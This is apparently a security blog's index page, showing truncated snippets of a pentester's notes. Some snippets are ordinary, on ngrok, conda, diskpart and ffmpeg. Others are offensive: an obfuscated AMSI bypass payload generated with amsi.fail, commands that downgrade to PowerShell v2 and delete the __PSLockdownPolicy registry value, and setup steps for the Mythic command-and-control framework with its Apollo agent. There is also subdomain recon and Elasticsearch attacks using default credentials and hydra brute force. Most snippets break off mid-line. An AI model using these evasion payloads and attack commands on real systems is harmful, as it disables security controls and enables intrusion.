Steinz Security

 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...

  #Create an env conda create -n EnvName python=3.11 #enter the env conda activate EnvName #Install the required packages now Create your directory and open visual studio code - if you are using `wsl` - make sure to install the wsl plugin and login - select the new `EnvName` at the bottom right corner in VS Code

  open cmd and run "diskpart" # List the hard disk list disk # Select the hard disk select disk 0 # list the partitions list partition # Select the partition that you want to delete and allocate it to new partition # if you are allocating it on a VM, just create a new partition, assign a volume to it # then delete it select partition 4 #Delete the partition delete partition override now go to `Disk Management` --> right click on the partition that you want to extend #you should observe Extend disk is not grayed out Select "Extend Disk" and now you can increase the Partition size

  #use Powershell v2 - Doesnt have any security controls powershell.exe -v 2 #Using Itemproperty Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\" -Name __PSLockdownPolicy    

  use https://amsi.fail/ to generate AMSI Bypass techniques   $iu9nUCYfZjO831cZ6=$null;$t9jdZOULRwE6UwvmtJ="System.$([char]([bYTe]0x4d)+[ChAr]([byTe]0x61)+[char]([BYTe]0x6e)+[ChaR](97*82/82)+[CHaR](103*90/90)+[CHar](101*27/27)+[CHaR]([ByTe]0x6d)+[CHar](101)+[chAR]([bYTe]0x6e)+[CHar]([bYtE]0x74)).$(('Âútômâtì'+'ón').NorMAlIZe([ChAR](70*67/67)+[cHaR]([BYTE]0x6f)+[CHaR]([BYTE]0x72)+[ChaR](109*41/41)+[Char](68+8-8)) -replace [cHAR](92*77/77)+[cHaR]([bYTE]0x70)+[cHAr]([BYtE]0x7b)+[CHaR]([bYte]0x4d)+[Char]([bYTe]0x6e)+[ChAR]([Byte]0x7d)).$(('Ãm'+'sî'+'Ût'+'ìl'+'s').norMALIZe([CHAR](70*53/53)+[chAR](111)+[CHar](114)+[CHar]([BYtE]0x6d)+[CHar]([bYte]0x44)) -replace [CHAR]([ByTe]0x5c)+[cHAR]([BYTE]0x70)+[char](123*9/9)+[chaR]([Byte]0x4d)+[ChaR]([byTE]0x6e)+[cHar](125+3-3))";$sxynqfmtovfgaojvecwrzknwdq="+('kphjwgrxthc'+'úkígùõíqfày'+'lî').norMAlIze([CHAR]([byte]0x46)+[Char](68+43)+[chAR]([ByTe]0x72)+[ch...

  Download the repo git clone https://github.com/its-a-feature/Mythic.git cd Mythic #Make the setup file sudo make Installing Docker sudo apt update sudo apt install -y docker.io sudo systemctl enable docker --now echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable" | \ sudo tee /etc/apt/sources.list.d/docker.list curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg sudo apt update sudo apt install -y docker-ce docker-ce-cli containerd.io Log out of Kali Session and re-Login   Running Mythic #make sure you are in Mythic main Directory cd Mythic #Compile and generate the mythic-cli binary sudo make #Start Mythic - give it few mins to download and setup containers - first time only sudo ./mythic-cli start #Setup Payloads - Apollo for Windows sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo.git sudo ./mythic-cli install g...

  Semgrep #Installation pip install semgrep==1.54.3 #Use below script to run it; update the paths in the script wget https://raw.githubusercontent.com/Bhanunamikaze/PenTest-Scripts/refs/heads/main/semgrep_runner.py #Download the rules git clone https://github.com/Bhanunamikaze/SemgrepRules-PHP.git PHP Code Snipper Download phpcs.phar file from PHP_CodeSniffer Releases sudo apt-get install php-tokenizer php-xml php phpcs.phar /path/to/PHP_Code Visual Code Grepper https://github.com/nccgroup/VCG/tree/master GitHub - tcosolutions/betterscan: Code Scanning/SAST/Static Analysis/Linting using many tools/Scanners with One Report (Code, IaC) - Betterscan For NodeJS GitHub - insidersec/insider: Static Application Security Testing (SAST) engine focused on covering the OWASP Top 10, to make source code analysis to find vulnerabilities right in the source code, focused on a agile and easy to implement software inside your DevOps pipeline. Support the following technologies: Jav...

  Refer to Simple WebPentest Checklist Subdomain Enumeration git clone https://github.com/TheRook/subbrute.git python subbrute.py domain.com > subdomains.txt git clone https://github.com/infosec-au/altdns.git altdns -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt #paste the list into Bulk URL HTTP Status Code, Header & Redirect Checker | httpstatus.io # this will give live hosts status make sure to check subdomain of the sub-domains #Other Tools amass enum -passive -norecursive -noalts –df domin.txt -o subs-1.txt amass enum -passive -norecursive -noalts –df subs-1.txt -o all-sub.txt Recon Automation #Better use https://github.com/smicallef/spiderfoot - this automates most of the basic tasks #use ReconFTW git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r #or Setup a container docker pull six2dez/reconftw:main docker run -it --rm \ -v "${PWD}/OutputFolder/":'/reconftw/Recon...

Create a Video from an Image - Video will be an image - Audio will be taken from the input video/audio file (-i 142.mp4) - Output file will be generated with Image as a video and audio from the input file  #USE CPU ffmpeg -loop 1 -framerate 1 -i image.jpg -i 142.mp4 -map 0 -map 1:a -c:v libx264 -preset ultrafast -tune stillimage -vf fps=10,format=yuv420p -c:a copy -shortest 142_output.mp4 # USE GPU ffmpeg -loop 1 -framerate 1 -i image.jpg -i 156.mp4 -map 0 -map 1:a -c:v h264_nvenc -preset fast -tune hq -vf fps=10,scale=1920:1080,format=yuv420p -c:a copy -shortest 156_output.mp4 Batch Script to Take a list of .mp4 files as input and create a new video file with 'video as a still image' and audio from the given audio file

  #Service Name and Version info - if no info is displayed, requires Auth curl 10.10.10.10:9200/ #Default Creds curl -X GET http://admin:elasticadmin@10.10.10.10:9200/ curl -X GET http://elastic:changeme@10.10.10.10:9200/ #Bruteforce Creds hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get / ALL PATHS _cat /_cluster /_security /_cat/segments /_cluster/allocation/explain /_security/user /_cat/shards /_cluster/settings /_security/privilege /_cat/repositories /_cluster/health /_security/role_mapping /_cat/recovery /_cluster/state /_security/role /_cat/plugins /_cluster/stats /_security/api_key /_cat/pending_tasks /_cluster/pending_tasks /_cat/nodes /_nodes /_cat/tasks /_nodes/usage /_cat/templates /_nodes/hot_threads /_cat/thread_pool /_nodes/stats /_cat/ml/trained_models /_tasks /_cat/transforms/_all /_remote/info /_cat/aliases /_cat/allocation /_cat/ml/anomaly_detectors /_cat/count /_cat/ml/data_frame/analytics /_cat/ml/datafeeds /_cat/fielddata /_cat/healt...